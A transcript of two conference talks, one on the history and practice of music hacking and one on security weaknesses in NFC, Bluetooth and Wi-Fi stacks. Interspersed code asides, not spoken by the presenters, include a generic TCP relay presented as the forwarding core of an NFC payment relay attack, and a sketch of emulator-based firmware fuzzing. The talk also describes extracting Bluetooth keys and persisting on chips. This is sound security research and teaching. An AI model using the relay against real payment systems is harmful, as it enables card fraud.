so. Delia Derbyshire, again the same: she's got a maths and music degree, she couldn't get a job, but she ended up basically pestering them into letting her do some interning at the Radiophonic Workshop, and eventually got a job there. And then she was the arranger and made the instrumentation for this. And now I'm gonna play this for you. Before I do, I want you to think about the fact that at the time every sound had to be physically cut and sticky-taped together, every single note, and there were no multi-track recorders back then either, okay? So it's an absolutely enormous process of recording the sound, stretching the sound, cutting the sound, sticking it back together, recording that onto a separate reel, then you've got this and then you add more sounds, and then you have, like, several
tapes that you have to condense into each other without multi-track technology, okay? They're literally on different machines shouting "go" at each other, and that's how they achieved multi-track. But she was very blasé about it, which was kind of amusing, because it seems ridiculous to me now to compose a piece of music like that, like a jigsaw puzzle, but she just shrugged and said, well, it seemed to work, which I find kind of charming. But yeah, so that's... oh no, why didn't it play? Well, I'm gonna play it for you anyway. And no, no synthesizers existed; this was literally just a mix. And she also recorded her own sounds for it, including my favourite, which was a little wobbulator. Good name, right? Yeah, so they actually used a lot of electronic engineering gear in their work, which was very fun. Anyway, the audio isn't cooperating, so let's move on. I did actually want to play one of her own songs; that was her commercial work, but she was also an experimental electronic musician in her own right. I think you kind of forget that music in the 50s and 60s actually was kind of wild as well. Let's see if we... this is one of her tracks from the 60s. But anyway, you might recognise this track, because it did get sampled: someone literally just rapped over the top of this and released the result as a track. She made this for a science fiction show that was based on an Asimov story, and the episode it was made for has been deleted from the BBC archives, which I find to be an absolute tragedy. I would love to watch that. If you play it backwards, the robotic sounds are singing praise to the master. Thank you, Daphne. So, that's my story of the BBC Radiophonic Workshop, but I wanted to leave you with a quote from one of the Radiophonic Workshop engineers, unfortunately unnamed in the documentary that I watched. I just thought this was kind of a cute sentiment: because they were making things up, they weren't the experts in the room, they didn't know what they couldn't do. So they just basically managed to mess around with stuff and ended up with something really special and really cool, something that was just iconic. Some of the biggest electronic music acts in the world today still say that the work of the BBC Radiophonic Workshop was one of their big influences in life as well. So yeah, that's the BBC Radiophonic Workshop. And I think it's really important that we allow for ridiculousness in technology, and we allow for ugly noises, and we allow for stupid things where you don't really see what they're for. The power of allowing for experimentation that isn't very successful at first, or doesn't sound successful to the outside ear, is really important. So, outsiders. That was a golden age: the invention of a new technology, or really the democratization of it, the availability of a new technology to a reasonable number of people, led to this amazing sea change in the way that people made music. Digital music, well, analog back then, but the way that we make music was changed by these experimenters. It was definitely a golden age for new techniques, but I think that we're currently in a golden age for people who are working with experimental instruments and experimental sound in general.
And I think that we've got loads and loads of really exciting new technologies that are available. We've got cheap microcontrollers, we can make our own PCBs, we can make our own synthesizers, and, crucially, we can access people. Think about it: Daphne didn't learn about musique concrète, didn't found the BBC Radiophonic Workshop, until she had a spark of an idea from somebody else. So really, gaining access to tools, learning techniques and being inspired by other people is really, really critical for anything to really change and to really happen. And I think that at the moment we've got really cool, accessible new technologies that more and more people are learning how to use, and which are becoming much simpler as well. And crucially, people are more accessible. People share, particularly in our community; people share their knowledge very freely, and you don't have to be in the same room to do this. I know a bunch of people are listening on the livestream right now, so you don't have to be here to learn about things. And you don't have to be in the room to attend a workshop with somebody, right? There are these wonderful YouTube tutorials now for sharing information, and these communities are just way more accessible through online places. We've got incredible communities and events as well. So this is, I mean, I shouldn't have put this slide in here, but it doesn't matter, this is one of my old hackerspaces, Machines Room in London, and it was one of the places where the music technology community in London was centred. It was there and the London Hackspace; there's a community called Hackoustic that I was involved with, and we used to do a lot of events there. The reason I put this slide in was just to show that hackerspaces and makerspaces often have some kind of music technology partnership, and those kinds of central spaces where you can share things, share knowledge, get inspired by each other's work and also hold events are really, really crucial. Actually, I do know why I put this slide in. This was a wonderful space for three years, and then the landlord raised the rent four times, and this amazing community of artists and designers and music hackers was removed. At the same time, the London Hackspace moved from central London to west London, and a bunch of other hackerspaces and fab labs closed as well, just because of how expensive the centre of London had become. And as a direct result of that, I moved to Berlin. By allowing this kind of gentrification of our hackerspaces, we really do destroy community, as much as we can also create community online, like this. So this is an example of awesome online community. This is a YouTube video from someone from the London music tech hacker scene, probably the most famous person from it. He's called Sam, and he goes by Look Mum No Computer on the internet. He's an electronic engineer and general-purpose weirdo, which is why I like him. And this is one of his creations: he made a Furby synth, which is as horrific as you imagine, if not more so. So don't look that up. I mean, do look that up, but genuinely, be prepared to not have a nice time. But he doesn't just show his instruments, he doesn't just perform with them; he does really awesome electronics teardowns as well.
I've learned a bunch of stuff from watching his videos and looking at how he's actually done things, and that's something that's really exciting. Maybe 20 years ago I wouldn't have had access to this kind of knowledge. I probably wouldn't even have known that I like this kind of stuff; I wouldn't have been exposed to it. And I certainly would have been going down my local pub saying, hey, who wants to work on a weird Furby instrument with me? And they'd be like, what? No. So it's kind of nice to be able to share your weird passions with other people on the internet. And then, of course, we have events; we're at one of these. This is me and my friend Phoenix. We've done a fair bit of music tech hacking together, and this is actually the British version of Congress, EMF Camp. I guess it's more the equivalent of Chaos Camp, actually. EMF Camp is on again in 2020 this year. It's a really cool, small hacker festival. These kinds of spaces and these kinds of events really allow, I mean, I've learned so much just by being here the last couple of days. So we should cherish the hackerspaces and the events, and we should also support people like Sam, who makes his living through Patreon and YouTube. By supporting makerspaces and events, and also by supporting individual people who put the effort into creating and sharing work, I think we can cherish this community. Okay, on to the final bit. I'm going to show you some of the cool projects that I've been working on with other people, and the reason I've chosen the ones that I'm showing you is because they also use some of my favourite ways that you can hack on instruments. So I figured I'd show you a project, but also show you how you can have a go at it yourself. Recently I've lived in London and Berlin, and one of my favourite things to do when I'm in a space is to make an instrument in the context of two or more people's work. I always find my work is way better if I'm collaborating with somebody else: what they do and what I do get smushed together to create something that's better than either of us could have done on our own. And I think this is a good example, if it will play. This is one of my first sonic circuit sculpture creatures. This started off as just an overnight hack with my composer friend Andrew Hockey and Drew Fustini from OSH Park, and myself, obviously, and we worked together overnight to create this. A circuit sculpture, if you don't know what circuit sculpture is, is basically where instead of putting your circuit inside a box, all of the parts, or the key parts, are shown and are actually celebrated as art in their own right. That's what circuit sculpture is. There are a couple of wonderful people doing it: this is a guy called Mohit, who makes really beautiful things and who's living in San Francisco, and then there's a guy called Jiri, who is in Prague, I want to say, and they make really, really awesome, tiny, neat things. But I'm not tiny and neat, so I make big, massive, messy things. So this is the first one I made. It was really interesting to me. I really like capacitive touch as a technology; it can be unreliable, but I find it really fun to work with, and it's very intuitive for a musician. And then that led to me developing a second creature.
I'm really inspired by kind of utopian science fiction, and I wanted to make a series of creatures that inhabited the same world and sang when you touched them. So this was the second in the series. This is a more traditional instrument; I mean, obviously it's still weird, but it's more traditional in that the first one was generative in some way, like semi-generative, and this one is more like one note per limb with two modes of modulation. This is a bass. So that's my bass creature, which I'm actually developing for a real musician now, an amazing bassist called Ayse Hassan, who is the bassist for Savages and was just on tour with the Pixies. I'm making her a stage-presence version, so she's going to be able to play it live, but that one's going to be more generation-based as well. It's kind of interesting to try and create something that in its functionality is very traditional but in its form is really weird, and that was fun to play with. Now, my latest one is another creature, but this one is kind of like an abstract cephalopod. It's going to be human-sized, and each of the limbs will play a different part of a choral arrangement, and then there's some kind of sunlight feature at the top where you can modulate it by touching the copper rods. I've actually made a prototype which you can listen to. So this is the latest version of one of the limbs of the tentacle, which I made. I made it just for the form, but then everybody seems to really like cuddling it, it's very comforting, so I decided to make it purr after I'd finished prototyping it. So if you want to listen to my purring tentacle afterwards, you can. It does sometimes work. But I should say, actually: this is machine-embroidered conductive thread, so it's able to detect capacitance. It's a capacitive touch sensor, essentially. It's a tentacle. So yeah, you can listen to that afterwards if you want; it mostly works, I made it yesterday. So yeah, that's quite fun. But again, I would not have been able to create the intricate sounds without the help of my composer friend, and I would not have been able to get the implementation I wanted onto the Beagle board without Drew. So it's really nice to sit together and mash up your skills. Now, these all use one of these. This is another one of my instruments, a wearable, flexible PCB. It's going to be a vocoder, but it's not finished yet. The reason I'm showing you that is because of the sensor that I use, which is called the Trill. Essentially, if anybody has used capacitive touch before, you've probably used an MPR121 sensor; this is like an MPR121 sensor plus plus. It's got something like 20-something pins, which is wild, and it's way more sensitive as well. So I find it really, really great. If anybody is doing stuff with capacitive touch and having problems with it: A, make sure you're grounded, and B, have a go with that Trill. It's like 10 euros, I think, that sensor, and it's made by Bela; you can see one of their boards there. Now I'm going to do a whole slide about Bela and fangirl about them, because they're my favourite technology at the moment to use for embedded instruments. This is the size, it's this big. It's based on the PocketBeagle, which is the size of a small Altoids tin. It's very, very small, but it's a full Linux computer.
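As an aside on the capacitive sensing just described: the MPR121 is a common hobbyist touch controller, and the sketch below shows the general idea of reading one, not the speaker's actual Bela/Trill setup. It assumes a CircuitPython-capable board with an MPR121 breakout on the default I2C pins and the Adafruit adafruit_mpr121 library installed; the note mapping is made up for illustration.

    # Minimal capacitive-touch reading sketch (assumption: CircuitPython board
    # with an MPR121 breakout on the default I2C pins, adafruit_mpr121 installed).
    # This only approximates the idea from the talk; the Trill sensors on Bela
    # use their own library and are not shown here.
    import time
    import board
    import busio
    import adafruit_mpr121

    i2c = busio.I2C(board.SCL, board.SDA)
    touch = adafruit_mpr121.MPR121(i2c)

    # Map electrodes (copper rods, conductive-thread pads, ...) to note names.
    NOTES = {0: "C3", 1: "E3", 2: "G3", 3: "B3"}

    while True:
        for pad, note in NOTES.items():
            if touch[pad].value:        # True while that electrode is touched
                print("play", note)     # in a real build: trigger a synth voice
        time.sleep(0.02)                # ~50 Hz polling is plenty for touch

As the talk notes, grounding matters a lot with this kind of sensor, so expect to spend some time on wiring and calibration before the readings are stable.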
And the Bela board is really, really awesome: super responsive, super low latency, which is really important when you're creating instruments. But also the cool thing is it runs this. This is Pure Data, a visual programming language for sound creation. A lot of artists and sound designers and music creators use this already; it's very similar to something called Max, actually made by the same guy, but this one's open source. So that's Bela and Pure Data, definitely worth checking out if you're interested in instrument design. The reason Bela is special is the low latency, but also because you basically can't get a microcontroller that will run Pure Data. Well, the Raspberry Pi does, but the latency on the Raspberry Pi is, like, meh. So I would always suggest, if you're doing something like this, that Bela plus Pure Data is a nice combo. Okay, that's that one. Then the other project I wanted to talk to you briefly about: this is Ariana Grande, who you probably don't know, but anyone under the age of 13 certainly will. And here she is demoing something called the MiMu gloves. It's gesture control: she's doing looping, she's doing effects, using, obviously, various gestures. Thank you, Ariana. So this is what she's using here, and this comes out of London, from the music tech company called MiMu that was originated by Imogen Heap, if you know her. I saw that Ariana video, and something I didn't mention is that I actually do quite a lot of teaching as well. When I saw that Ariana video, I just thought, oh my god, if I showed this to a 12-year-old girl and told them we could make one, they would lose their mind. But these cost like five grand, so I didn't think I could get one to use in the classroom. So I just messaged Imogen and asked her if I could make a children's version, and she said yes. And so I did, using this wonderful piece of technology called the micro:bit. It's like a my-first-microcontroller made by the BBC. It's like 10 pounds, it's very, very cheap, it doesn't do a lot, but what it does, it does very well and very simply. And I was able to make an approximation of a $5,000 glove with a $10 microcontroller, which is the core of the product that I made, actually. But I haven't got time to talk to you about that. That's my leather robot-unicorn gesture controller; can't tell you about that. This is another artist; got no time for that either. So we're going on to this last one. Basically, I was able to, with one bridge, one micro:bit and a little bit of code, get it to work with professional music software. And this is a musician called Bishi, who's really awesome, and this is her using my $10 hack to do a very similar thing to the $5,000 gloves. And of course that's not stadium level, Ariana Grande couldn't use that on tour, but it was a fun project that we hacked together. And that's my time. By the way, how I did all of that is on my GitHub, all of the code. If you've already got a micro:bit, you can do it yourself, or you can get the kit for like 30 bucks, it's not very expensive. So all of that's on my GitHub, along with some weird Furby sounds and things, and you can follow along on my weird electronic adventures on my Twitter. I'm pretty reactive, so say hi to me, and I'll be hanging around here if you want to listen to my tentacle. So, the end. Okay. Helen Leigh, whoa. Thank you. Thank you, Helen, for this fantastic presentation.
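To give a flavour of the micro:bit glove idea in code, here is a minimal MicroPython sketch that streams accelerometer data over the USB serial port; a host-side bridge (not shown) would translate these lines into MIDI for music software. This is only an approximation of the approach described in the talk, not the actual MiniMu code, which lives on the speaker's GitHub.

    # Gesture-streaming sketch for a BBC micro:bit (MicroPython).
    # Assumption: a separate host-side bridge reads these CSV lines from the
    # USB serial port and turns them into MIDI control changes.
    from microbit import accelerometer, button_a, sleep

    while True:
        x = accelerometer.get_x()    # tilt left/right, roughly -2048..2047
        y = accelerometer.get_y()    # tilt forward/back
        grab = 1 if button_a.is_pressed() else 0   # a simple "grab" gesture
        print("{},{},{}".format(x, y, grab))       # one CSV line per reading
        sleep(50)                    # about 20 readings per second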
I'm wondering actually how are we going to play that thing there with the slime. Are there questions here? No? Yes, yes, online, of course. They're far more speedy than we shoot. So the question from the internet is, have you ever considered creating music without human interaction? Yes. Okay, then next one. Thank you. Good night. No, I mean, personally, I'm a very tactile person. So I like creating instruments that you stroke that are affectionate almost and kind. I like giving the things that I create some kind of persona and that you interact with them. However, a lot of people, there's a lot of people doing really interesting things with generative, non-human interactive art. In fact, the composer friend that I was talking about, Andrew Hockey, he's done a lovely, he's hacked a musical marble run. It's just automated. When the marbles go down the marble run, it will trigger generative science, which is really, really cool. There's lots of people doing it, but for me personally, I just, I know, I like touching the objects that I make. And the kind of strange person who walks around a craft store with a multimeter kind of like touching things and like figuring it out if they're conductive. Like adequately conductive. So you're measuring, I thought. So for example, in fabric stores, there might be something that's conductive that's not actually billed as conductive. Or I'll often go to art stores and craft stores or architectural supply stores. And you can find, you know, you don't have to go to Conrad. You can go to modular with your multimeter. In fact, it's actually, it's either, it's either conductive or it's not, right? You know? We believe you. I'm just imagining you there. Oh yeah, no, it's, it's, yeah. I've had some strange looks. A question here from number two, please here in the front. Have you also created instruments that actually work with the physicality of the object that you have built instead of triggering sound processing? So actually, you mean, in what way? If the tentacle itself, the sound it produces would be amplified and somehow that's the base of the processing of the actual sound that comes out. Yes, actually when the tentacle is done, it will have some kind of physical feedback loop in it that will be reactive to its, to its space, to its personal space even as well. So actually the cool thing about capacitive touch technology is if you get the thresholding right, you can not just sense touch, you can sense proximity. And that kind of also varies on how many people are in the room as well. So you can get it to react quite, not uniformly, but you can get it to react quite nicely to its environment and also the way that people are manipulating it as well. And you can also code some cool things into that as well, so basically based on the number of touches, how often people have played with it, and how people have played with it. Get that to feed back in to the music that it's making in a generative fashion. There's lots of cool things that I want to do with this next sculpture. Thanks. I'm so sad. I really have a spoiler here. I really, we have to shut this now and I would like you to ask to talk to her personally here next to the stage. Thank you all for being here. Thank you. Thank you, and a little leave for this fantastic presentation. Thank you.
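Picking up the thresholding point from the Q&A: with capacitive sensors you typically get a raw value that drifts with the environment, so touch versus proximity is usually decided against a slowly adapting baseline. Below is a hardware-independent sketch of that idea; the numbers are purely illustrative assumptions.

    # Toy baseline-and-threshold classifier for raw capacitance readings.
    # The thresholds and smoothing factor are illustrative assumptions only;
    # real sensors (MPR121, Trill, ...) need per-build calibration.
    TOUCH_DELTA = 200        # large change from baseline -> treat as touch
    PROXIMITY_DELTA = 40     # small change from baseline -> hand is nearby
    ALPHA = 0.01             # how quickly the baseline follows slow drift

    def classify(readings):
        baseline = readings[0]
        for raw in readings:
            delta = raw - baseline
            if delta > TOUCH_DELTA:
                yield "touch"
            elif delta > PROXIMITY_DELTA:
                yield "proximity"
            else:
                yield "idle"
                # adapt the baseline only while nothing is happening, so a
                # resting hand does not get calibrated away
                baseline = (1 - ALPHA) * baseline + ALPHA * raw

    # A hand approaching, touching, then leaving:
    print(list(classify([1000, 1005, 1050, 1300, 1310, 1040, 1002])))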
I will explore the ways in which music is influenced by making and hacking, including a whistle-stop tour of some key points in music hacking history. This starts with 1940s Musique Concrète and Daphne Oram's work on early electronic music at the BBC, and blossoms into the strange and wonderful projects coming out of the modern music hacker scenes in London and Berlin, including a pipe organ made of Furbies, a sound art marble run, robotic music machines, gesture controlled moon cellos, and singing circuit sculptures. I'll also be sharing some of my own work, plus my favourite new ways to make embedded instruments, including plenty of amazing Open Source hardware and software.
10.5446/53216 (DOI)
Our next speaker is Jiska. Jiska has been attending this conference for ages, like a decade? Even more? A long time. Sometimes she also gives talks here; the last one, last year, was about Bluetooth, where she went really in depth. This time it will be a more general talk about wireless protocols: NFC, LTE, Wi-Fi, and of course Bluetooth. She will tell us what is broken in all those protocols. So have fun and enjoy the talk: All wireless communication stacks are equally broken, by Jiska. So welcome to my talk. I first thought of it as a foundations talk, but it will also have new topics about everything that is kind of fundamentally broken in wireless communication, and it will cover anything in your smartphone, so NFC, Bluetooth, Wi-Fi, LTE. You could order them by communication range, or by specification length, or by lines of code. But the thing is, specification length and lines of code also mean increased complexity, and if there is increased complexity, you will inherently have issues with security. And then there is something that is even worse than LTE, which is vendor-specific additions. That would be when you open like five instances of IDA and try to analyze where a wireless message is going and what it is doing. So most of this talk will be about wireless exploitation, and the new stuff will be fuzzing techniques and a new escalation target, but everything else is more like a general view on wireless exploitation. So the first thing to understand about a wireless exploit is to separate it into different layers. There is the lowest layer, which is some dedicated chip that runs a firmware, let's say a Bluetooth firmware, which is then attached to a driver. Then there is some privileged stuff; it depends a bit on what kind of system you're on. And in the end there will be applications. And no matter where your exploit is, on the layer that you're exploiting, some security measures become ineffective. So for example, if there is encryption and you have an exploit for that layer, the encryption becomes ineffective. And the higher you are, the higher the exploit prices get: for a Wi-Fi RCE you would be at around 100K, for a baseband RCE with local privilege escalation it already gets to 200K, and if it's a messenger or something, then it's really, really high in price. So the question is, why is this wireless stuff a bit cheaper? Well, you need to be within a certain distance, so that's probably a thing. And then also maybe they are just too easy to find, I don't know, at least maybe for me. Or maybe the market demand is not that high for them, or they are not privileged enough, I don't know. But they actually need little or no interaction, so they are still a thing, I would say. So within the group I'm working at, we have done a lot of wireless research, and also released tools. The first one that I think was running on a mobile phone is NFCGate, which is currently maintained by Max. Then there is the next one, which is our largest project, which is patching of Broadcom Wi-Fi firmware, Nexmon. Matthias, who did that, reached his goal of basically being able to say, I now have kind of a software-defined radio in a commodity Broadcom Wi-Fi chip. And then he was a bit bored and kicked off two new projects before he left, which he then handed over. The first one is Qualcomm LTE, and the second one was Broadcom Bluetooth, which I ended up with.
And then we have someone else, who is Milan, and he's doing stuff that comes more from the application layer. He implemented an open-source solution for Apple AirDrop that you can run on your Raspberry Pi. And well, hackers gonna hack: this stuff has been used a lot for exploitation, not by us, but by others. There were three groups using Nexmon for Wi-Fi exploitation, at least among what is publicly known and the bigger ones; maybe I forgot someone, but there's a lot of exploitation going on there. Then InternalBlue has been used to demonstrate an attack against the key negotiation of Bluetooth just this August, and the open AirDrop implementation was used for some honeypots and for AirDoS, and a lot of stuff is going on there. And then you might ask yourself: if everybody's using it for exploitation, why don't we just do it ourselves? And we actually did that, and we even did that for this very first project, the NFC project. The most important thing you need to know about NFC is that the near field is not really near field. It's just communication, but it's not near-field communication, which means that if you are able to forward the communication, for example you have your credit card and then a smartphone with NFC, you could forward it over the cloud or some server and then to another smartphone and then to the payment terminal, and usually there's no time constraint or distance bounding that would prevent this. So you can at least forward and relay messages, and you might even be able to modify them on the way. Some students of ours did some testing on some systems of some third parties, who then politely asked them to please stop the testing. So it was not really a cool thing overall, not good to publish and so on. And so I'm all the more happy that there are other researchers who actually used some other tooling to look into NFC: just this month there was a talk at Black Hat, not by us but by others, about Visa credit cards, and it's just all broken, and it's cool that people did it anyway. Yeah, so the NFC stuff is more about forwarding and the actual specification, but something that is also interesting is if you get code execution within a chip, and this is a very different attack scenario. For Bluetooth I think it's especially bad because of how everything is designed. The first design issue in Bluetooth is that the encryption key is stored in a way that the chip can always ask the host for the encryption key, or it's even already on the chip, and there is no kind of protection there. So whenever you have code execution on the chip, it means you can get all the encryption keys, not just the one for the active connection, and then break everything that is a trusted connection based on such a key. That even breaks features like Android Smart Lock. Android Smart Lock is the thing where you can unlock your Android smartphone if you have a trusted device nearby, and you might do this for your car, because it's nice in your car when you have your audio and your navigation and everything without a locked smartphone. But the question is: how secure is the Bluetooth of your car? Would you trust it to unlock your smartphone? I don't know. And the next thing is, if you have code execution on a Bluetooth chip, it also means that you might be able to escalate into some other components, so that you go up all the layers.
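Going back to the NFC relay scenario described above: at its core it is just forwarding bytes between two endpoints over any transport. As a hedged illustration of only the forwarding part, here is a tiny generic TCP relay; the NFC-specific pieces (card emulation on one phone, reader mode on the other, as in NFCGate) are deliberately left out, and the host and port values are placeholders.

    # Generic byte-forwarding relay: whatever arrives from one peer is pushed
    # to the other. In an NFC relay, "downstream" would be the phone emulating
    # a card at the terminal and "upstream" the phone talking to the real card.
    # NFC framing and card emulation are not handled here.
    import socket
    import threading

    def pump(src, dst):
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)

    def relay(listen_port, upstream_host, upstream_port):
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", listen_port))
        server.listen(1)
        downstream, _ = server.accept()
        upstream = socket.create_connection((upstream_host, upstream_port))
        threading.Thread(target=pump, args=(downstream, upstream), daemon=True).start()
        pump(upstream, downstream)

    if __name__ == "__main__":
        relay(9000, "relay.example.org", 9001)   # placeholder endpoints

The point of the sketch is that nothing in this forwarding step enforces timing or distance bounding, which is exactly the gap the talk describes.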
The next question is exploit persistence. So let's say I have something running on the chip, extracting encryption keys or doing whatever; you might ask yourself, how long will it stay on the chip? I mean, it's just a Bluetooth chip, you switch Bluetooth off sometimes. And then the specification, at almost page 1,000, so that's only the first third of the specification, says that the HCI reset command will not necessarily perform a hardware reset; this is implementation-defined. Then I looked into the Cypress and Broadcom chips, and yeah, if you do an HCI reset it's obviously not a full hardware reset, it's just flushing some connection state here and there. So there are definitely memory areas where you could put your exploit, and it would be persistent. So then you might say, okay, what do I do? I put my smartphone into flight mode? For a hardware reset that usually doesn't work. You might also reboot your phone; in most cases this works, but for some of the coexistence stuff I had the impression that, and it's a bit strange, it might not necessarily reset. Turning it off for a while might hard-reset the chip, I think. Or you just put your smartphone in a blender, and then, yeah, that might finally turn off the Bluetooth chip. So the next issue is: let's say we want an exploit running there, but we first need an exploit, so the very first step is still missing as a building block. After the talk last year, I did some stuff with Unicorn and fuzzing on the chip, and it was super slow. And then suddenly Jan showed up, and Jan said: hey, I want to build a fully emulated chip for super fast fuzzing and attach it to Linux, and everything should run as on a real system, just the over-the-air input will be fast. And I was like, you cannot build this for your master's thesis. And then he built that thing within three months, and for the remaining three months he was writing a thesis and emails to vendors. So here we go: what does Frankenstein do? It starts from an evaluation board, just a normal Bluetooth board that's connected to a Linux host over UART and, via the modem, over the air. He would then snapshot that chip state, emulate it and give it fast input, while it stays attached to the real host. That means that if you find some vulnerability, it might be in any of the components: it might also be on the Linux host, or it might be something that is full-stack, so something that starts on the chip, goes to the host, the host requests further things, and then it goes back to the chip, so you could build quite complex stuff. And for this I have a short demo video. The reason why I show this as a video is that it might otherwise find overflows live, and also it's not super stable at the moment. So you can see it scanning for devices, and most of the time it would get my phone's packets, but sometimes it would also get normal packets and some mesh stuff, whatever. So this is Frankenstein running. What Jan focused on is early connection states, that means stuff where you don't need a pairing, and he found heap overflows there in very basic packet types, so quite interesting. And then that stuff was fixed, I think, or hope, whatever, at least in very recent devices.
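Frankenstein itself re-hosts the real firmware image and attaches it to the Linux host; the code below is only a heavily reduced sketch of the general snapshot-and-emulate idea using Unicorn. The addresses, the snapshot file and the parser entry point are all made-up assumptions, so this will not run against a real Broadcom image as-is.

    # Sketch of snapshot-based firmware fuzzing with Unicorn (illustrative only).
    # All addresses, the snapshot file and the parser entry point are assumed;
    # a real setup like Frankenstein derives them from the actual firmware.
    import os
    from unicorn import Uc, UcError, UC_ARCH_ARM, UC_MODE_THUMB, UC_HOOK_MEM_UNMAPPED
    from unicorn.arm_const import UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_SP

    RAM_BASE, RAM_SIZE = 0x200000, 0x100000   # hypothetical snapshot region
    RX_BUFFER = 0x210000                      # hypothetical packet buffer
    PARSER_ENTRY = 0x245678                   # hypothetical frame parser
    STACK_TOP = 0x2F0000

    def crash_hook(uc, access, address, size, value, user_data):
        print("memory fault at 0x%x" % address)   # candidate heap/OOB bug
        return False                              # stop emulation here

    def run_once(snapshot, payload):
        uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB)
        uc.mem_map(RAM_BASE, RAM_SIZE)
        uc.mem_write(RAM_BASE, snapshot)       # restore the frozen chip state
        uc.mem_write(RX_BUFFER, payload)       # inject the "received" frame
        uc.reg_write(UC_ARM_REG_R0, RX_BUFFER) # assumed calling convention
        uc.reg_write(UC_ARM_REG_R1, len(payload))
        uc.reg_write(UC_ARM_REG_SP, STACK_TOP)
        uc.hook_add(UC_HOOK_MEM_UNMAPPED, crash_hook)
        try:
            uc.emu_start(PARSER_ENTRY | 1, 0, count=500000)  # |1 = Thumb mode
        except UcError as e:
            return e                           # crashes are what we fuzz for
        return None

    snapshot = open("firmware_snapshot.bin", "rb").read()    # placeholder file
    for _ in range(1000):
        run_once(snapshot, os.urandom(64))     # dumb random input for brevity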
And then the iPhone 11 came out, and in contrast to the specification, over the air the iPhone 11 says: hey, I'm Bluetooth 5.1. I was like, wow, the first consumer device with Bluetooth 5.1. And I don't really mind the way of exploitation as long as I can get code execution on the chip; if it needs user interaction and a pairing and whatever, I don't care, as long as I get code execution on it. So I was like, okay, let's add some fuzzing cases to Frankenstein and continue fuzzing. And then I found that the specific evaluation board that Jan was building this for has a problem with the heap configuration for certain packet types, and if you change that, you brick the device. I mean, I've bricked two evaluation boards trying to fix stuff, so yeah, they're just bricked. And so for me, continuing fuzzing means porting something like 200 handwritten hooks to another evaluation board. It's almost running; there's just some stuff with thread switching that is not super smooth yet, but it's almost on the next board. Further plans are to add more hardware: we are also working on the Samsung Galaxy S10 and probably a MacBook to get it in there, so then it would not just be Linux, but at least macOS, maybe Android, I don't know yet. And another thing that would be cool, and that we didn't build yet, but it might be feasible with something like a USRP X310 over PCI Express, with an FPGA and all that fancy stuff, is to get real over-the-air input. That would mean you have a full chain: real Bluetooth packets coming in over the air, going all the way up to the host and back. And you could also use that just to test your new modulation scheme or whatever you want to change, so not just security. Yeah, so the next thing is: if you have code execution, what do you do with it? The normal approach is to try to go all the layers up, but there might also be some chip-level escalation, and you might immediately see it in the next picture. This is from a Broadcom chip, but it's something that you would also see in many other chips: you have a shared antenna. You could also have two antennas, but they are both on 2.4 GHz, in the very same smartphone, super close to each other, and you would get interference. So you share the same antenna and do some coordination about when Bluetooth is sending and when Wi-Fi is sending, so that they don't interfere. This feature is called coexistence, and there are tons of coexistence interfaces; this is just the one from Broadcom. And when I saw it, I was like: oh Francesco, let's look into this, you know all the Wi-Fi stuff, I know all the Bluetooth stuff, let's do something. And he was like: no, it's just a marketing feature, so that they can sell one chip for the price of two chips or something. And I was like: no, no, no, it must be an exploitation feature. So, to end this discussion, I went to Italy to eat some ice cream. And the reality is somewhere in between: it's more like hard-coded blacklisting for wireless channels and stuff, traffic classes for different types of Bluetooth and Wi-Fi traffic, and you can look it up in tons of patents, and it's super, super proprietary.
And so we, let's say we played a game, which was like, I tried to steal his antenna, and he tried to steal my antenna, and so it turned out, if you do that, you can turn off Wi-Fi via Bluetooth, Bluetooth via Wi-Fi, and then, so like on most phones, you need to reboot them, some of them even reboot them themselves, so this is just like a speed-accelerated thing within Samsung Galaxy S8 that is not up to date. For iPhones, you would just immediately see a reboot without any interaction of things going off and on, so Broadcom is still in the process of fixing it, I don't know if they can fix it, but they said they could fix it, but something you should definitely fix is like the driver itself, so that the smartphone reboots and so on, so I don't know, but it would be fixed actually in iOS 13 because it mentions Francesco and me, but still on 13.3, I don't know, it's still, you can still crash the iPhone that way. But it's just some resource blocking, so it's like not a super dangerous thing, I would say, and you still need Bluetooth RCE before you could do it and so on, but still not cool that it's still not fixed. Yeah, so what about the other stacks and the escalations? So there's tons of different Bluetooth stacks, so it's really a mess, and obviously because of Frankenstein, we had this first Linux Bluetooth stack attached and so on, but yeah, so what has been there for a wireless 2017, this BlueBorne attacks, you might have heard of them and they found escalations like on Android, Windows, Linux, iOS, whatever, and then you might say, like in security, you often say, so someone looked into it, it must be secure now, and then there are so many features coming, so there's all these IoT devices, so everybody nowadays has wireless headphones and fitness trackers and Bluetooth is always on, and in the Apple ecosystem, it's really a mess, so if you have more than one Apple device, you would have Bluetooth enabled all the time, otherwise you couldn't use a lot of features, and then there's stuff like Web Bluetooth, so Bluetooth LE support from within the browser, so it's like a lot of new attack surfaces that arise since then, so I think, so that's more like my personal estimation, it's like 2020 might be more BlueBorne-like attacks. Yeah, so the saddest Bluetooth stack somehow is the Linux Bluetooth stack, so I don't want to blame the developers there, I mean it's not their fault, but it's like not enough people contributing to that project, and if you would try to analyze something that is going on in the stack, and you don't really know what is going on, you would do like get blame, whatever, and you would always see the same guy as the committer, so at least if you're on a specific problem, then there's only one person committing there, and so the picture down there actually has like the same guy twice, so this is also a bit of a pun here intended, we did some fuzzing in there, we still need to evaluate some of the results, so yeah, but I also feel like nobody is really using it, and it's kind of sad, I mean there's some Linux users I guess, but yeah. 
Then there is the VIRUS stack, I would say, so there's the Apple Bluetooth stack, and this one is actually three, so there is a macOS Bluetooth stack, there's an iOS Bluetooth stack, they are definitely different, and then there's a third embedded one for example for the AirPods, they are all running different things, so yeah, whatever, and then they also have tons of proprietary protocols on top of their Bluetooth stuff, that are also very special, and I had like at least two students, there's just one porting it to iOS, one to macOS, and then we also have students working on the other protocols that are on top of Bluetooth, and if you look into this it's like, what the hell, so it's really hard to reverse engineer because you have like three different implementations, and then sometimes you're like, yeah, okay, maybe it's also just bad code, and in the end, so from what I saw so far, I would say that it's kind of both, yeah, and then there is the stack that I played also a lot around with, which is the Android Bluetooth stack, and they did a lot for the security in the recent releases, and it annoys me so much that when I want to get internal blue running on it, I just echo to the serial port instead, so I bypass everything that the operating system does, and so something that Android cannot do which Apple does is, so Apple has all the proprietary protocols, something goes wrong, they immediately cut the connection, but Android doesn't because of compatibility and stuff, so you could just send 